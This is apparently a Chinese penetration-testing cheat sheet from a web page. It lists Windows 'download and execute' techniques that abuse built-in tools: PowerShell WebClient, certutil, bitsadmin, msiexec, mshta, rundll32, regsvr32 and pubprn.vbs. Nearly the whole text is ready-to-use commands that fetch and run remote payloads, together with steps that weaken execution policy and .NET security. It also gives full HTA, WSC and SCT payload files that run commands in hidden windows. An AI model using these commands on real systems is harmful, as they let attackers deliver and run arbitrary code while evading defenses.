Windows下载执行文件总结
Powershell
Powershell 一般情况有策略限制可以通过更改执行策略或绕过来执行
Get-ExecutionPolicy 查看执行策略
Set-ExecutionPolicy UnRestricted 更改执行策略
$client = new-object System.Net.WebClient
$client.DownloadFile('url','path')
powershell(new-object System.Net.WebClient).DownloadFile('url','path')IPC$
copy \\192.168.1.\file path
certutil
certutil -urlcache -split -f url filename
bitsadmin
bitsadmin /transfer n url path
msiexec
先生成 msi 文件
msfvenom -f msi -p windows/exec CMD=calc.exe>test.msi
msiexec /q /i http://192.168.1.1/test.msi
IEExec
IEExec 自行在.net 安装目录中找
caspol -s off 关闭.net 安全策略
IEExec http://192.168.1.1/test.exe
mshta
mshta http://192.168.1.1/run.hta
run.hta
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // 这里填写命令
self.close
</script>
<body>
test
</body>
</HEAD>
</HTML>
mshta 执行 vbscript
mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)mshta 执行 javascript
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script: http://192.168.1.1/calc.wsc")calc.wsc
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
rundll32 执行 hta
rundll32.exe url.dll,OpenURL "calc.hta"
calc.hta
<html><head><script>
a=new ActiveXObject("WScript.shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe',0);
window.close();
</script></head></html>
rundll32 执行 url
rundll32.exe ieframe.dll, OpenURL <本地 URL 文件路径>
rundll32.exe url.dll, OpenURL <本地 URL 文件路径>
rundll32.exe shdocvw.dll, OpenURL <本地 URL 文件路径>
URL=file:///c:\windows\system32\calc.exe
regsvr32
regsvr32 /u /s /i: http://192.168.1.1/test.png scrobj.dll
test.png
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
pubprn.vbs
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script: https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
上一篇: Windows 提权常用命令
下一篇: 渗透提权 Windows 篇
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论